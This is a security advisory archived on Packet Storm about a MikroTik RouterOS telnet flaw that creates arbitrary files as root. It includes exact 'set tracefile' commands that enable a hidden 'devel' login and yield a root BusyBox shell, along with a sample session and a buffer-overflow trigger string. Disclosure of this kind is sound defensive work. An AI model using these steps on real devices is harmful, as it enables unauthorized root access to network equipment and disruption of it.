what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mikrotik RouterOS Telnet Arbitrary Root File Creation

Mikrotik RouterOS Telnet Arbitrary Root File Creation
Posted Dec 14, 2018
Authored by Hacker Fantastic

An exploitable arbitrary file creation weakness has been identified in Mikrotik RouterOS that can be leveraged by a malicious attacker to exploit all known versions of Mikrotik RouterOS. The RouterOS contains a telnet client based on GNU inetutils with modifications to remove shell subsystem. However an attacker can leverage the "set tracefile" option to write an arbitrary file into any "rw" area of the filesystem, escaping the restricted shell to gain access to a "ash" busybox shell on some versions. The file is created with root privileges regardless of the RouterOS defined group.

tags | exploit, arbitrary, shell, root
SHA-256 | a939b73387c51054bd5c4c1fabbeade0aabd8445df951b5f0caf507ff0713454

Mikrotik RouterOS Telnet Arbitrary Root File Creation

Change Mirror Download
Mikrotik RouterOS telnet arbitrary root file creation 0day
==========================================================
This weakness occurs "post-authentication" and can be used to escape the
restricted shell on Mikrotik devices and escalate "readonly" privileges.
Mikrotik contains a hidden "devel" login option which can be enabled
through use of an "options" package.

An exploitable arbitrary file creation weakness has been identified in
Mikrotik RouterOS that can be leveraged by a malicious attacker to exploit
all known versions of Mikrotik RouterOS. The RouterOS contains a telnet
client based on GNU inetutils with modifications to remove shell subsystem.
However an attacker can leverage the "set tracefile" option to write an
arbitrary file into any "rw" area of the filesystem, escaping the
restricted
shell to gain access to a "ash" busybox shell on some versions. The file is
created with root privilieges regardless of the RouterOS defined group.

On versions 4.10 to 5.26 an attacker can enable the "devel" login to escape
the restricted shell by creating the following file:

"set tracefile /nova/etc/devel-login"

On versions 6.0 to 6.40 the same can be achieved with the file:

"set tracefile /flash/nova/etc/devel-login"

This will allow access to a "ash" shell using the "devel" login which has
the
same password as the "admin" user. Advantages of using this method over
known
public methods is that it does not require reconfiguration of device via
backup
files or require a system reboot. On versions greater than 6.40 this issue
can
be exploited to overwrite files such as "user.db" from low-privileged user
accounts to disrupt operation of the device.

On versions above 6.40 this issue can only be leveraged to overwrite files
as
root due to changes in the "devel-login" now requiring creation of an
"option"
folder in a read only partition.

An example of exploitation on impacted devices is shown below:

[admin@MikroTik] > system telnet
address:
telnet> set tracefile /flash/nova/etc/devel-login
tracefile set to "/flash/nova/etc/devel-login".
telnet> quit

Welcome back!
[admin@MikroTik] > system telnet 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

MikroTik v6.40.9 (bugfix)
Login: devel
Password:


BusyBox v1.00 (2018.08.20-07:26+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

#

Errata: an additional advisory accompanying this one references
multiple buffer overflow vulnerabilities in inetutils telnet clients.
The Mikrotik telnet client is also susciptible to these weaknessses. A
trigger for the overflow condition is shown below.

telnet> environ define DISPLAY
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
telnet> open 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.


telnet: buffer overflow, losing data, sorry
telnet: ring.cc: 143: int ringbuf::flush(): Assertion `top-bot > 0 &&
top-bot <= count' failed.

Welcome back!
[admin@MikroTik] >


-- Hacker Fantastic
11/12/2018

https://hacker.house


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close